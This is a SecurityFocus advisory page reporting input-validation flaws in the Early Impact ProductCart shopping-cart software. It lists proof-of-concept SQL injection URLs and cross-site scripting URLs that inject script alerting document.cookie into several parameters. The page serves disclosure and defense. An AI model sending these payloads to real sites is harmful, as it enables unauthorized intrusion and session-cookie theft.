Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Early Impact ProductCart Multiple Input Validation Vulnerabilities

The following examples are available:

SQL:
http://www.example.com/productcart/pc/advSearch_h.asp?priceFrom=0&priceUntil=999999999&idCategory='SQL_ERROR&idSupplier=10&resultCnt=999&keyword=dcrab
http://www.example.com/productcart/pc/advSearch_h.asp?priceFrom=0&priceUntil=999999999&idCategory=0&idSupplier=10&resultCnt='SQL_ERROR&keyword=dcrab
http://www.example.com/tarinasworld_butterflyjournal.asp?offset='SQL_INJECTION

XSS:
http://www.example.com/productcart/pc/NewCust.asp?redirectUrl=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/storelocator_submit.asp?countrysearch=1&country=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/productcart/pc/techErr.asp?error=<script>alert(document.cookie)</script>
http://www.example.com/productcart/pc/advSearch_h.asp?priceFrom=0&priceUntil=999999999&idCategory=0&idSupplier=10&resultCnt=999&keyword=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E







 

Privacy Statement
Copyright 2008, SecurityFocus